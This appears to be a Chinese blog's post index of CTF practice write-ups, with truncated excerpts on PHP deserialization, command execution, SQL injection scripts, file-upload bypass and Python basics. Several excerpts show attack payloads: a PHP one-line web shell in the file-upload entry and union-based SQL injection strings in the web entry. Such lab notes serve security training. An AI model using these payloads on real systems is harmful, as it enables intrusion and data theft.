buuctf [ZJCTF 2019]NiZhuanSiWei 1知识点: data:// 写入数据 php://input 执行php //filter 查看源码 12345678910111213141516171819<?php $text = $_GET["text"];$file = $_GET[&qu 2023-08-06 刷题 #buuctf
ctfshow反序列化 web254123456789101112131415161718192021222324252627282930313233343536373839404142error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username=& 2023-06-04 刷题 #ctfshow
反序列化 简介序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换为对象供程序使用。在PHP中序列化和反序列化对应的函数分别为serialize()和unserialize()。 漏洞当程序在进行反序列化时,会自动调用一些函数,例如__wakeup(),__destruct()等函数,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函 2023-05-20 web #反序列化
litctf 2023 [LitCTF 2023]Vim yyds访问:.index.php.swp下载下来 恢复文件:vim -r .index.php.swp或者vi -r .index.php.swp 123456789<?php error_reporting(0); $password = "Give_Me_Your_Flag"; 2023-05-15 比赛 #比赛
sql注入脚本笔记 GET型bool盲注1234567891011121314151617import requestsimport timeurl = "http://127.0.0.1/sqli-labs-master/Less-5/"right = "You"# 注意缩写,python缩写def database_name(): name = '' 2023-05-11 web #sql注入
python基础语法标识符 第一个字符必须是字母表中字母或下划线 _ 。 标识符的其他的部分由字母、数字和下划线组成。 标识符对大小写敏感。 在 Python 3 中,可以用中文作为变量名,非 ASCII 标识符也是允许的了。 注释Python中单行注释以 # 开头多行注释可以用多个 # 号,还有 ‘’’ 和 “”” 行与缩进python最具特色的就是使用缩进来表示代码块,不需要使用大括号 {} 2023-05-10
web web1ctrl+u 查看源码找到base64编码的flag web2尝试使用万能密码 11' or 1=1# 发现登录成功联合查询找到回显位置 11' or 1=1 union select 1,2,3# 接着爆库 11' or 1=1 union select 1,database(),3# 爆表 11' or 1=1 union select 2023-05-07 刷题 #ctfshow
ctfshow命令执行 web2912345678910error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlig 2023-04-26 刷题 #ctfshow
ctfshow文件上传 151绕过前端验证方法1:直接关闭浏览器的js方法2:上传.png(只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀为.php,内容为一句话 1<?php @eval($_POST['shell']);?> 152上传 shell.php然后抓包修改content-type为 image/png或者上传.png文件后修改后缀为.php 直接 2023-04-24 刷题 #ctfshow
命令执行 命令执行漏洞简介:原因:未对用户输入进行检查过滤,导致用户输入的参数被应用当成命令来执行。 命令执行漏洞是指应用有时需要调用一些执行系统命令的函数,如:system()、exec()、shell_exec()、eval()、passthru()等函数,代码未对用户可控参数做过滤,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。 危害: 继承 Web 服务 2023-04-21 web #命令执行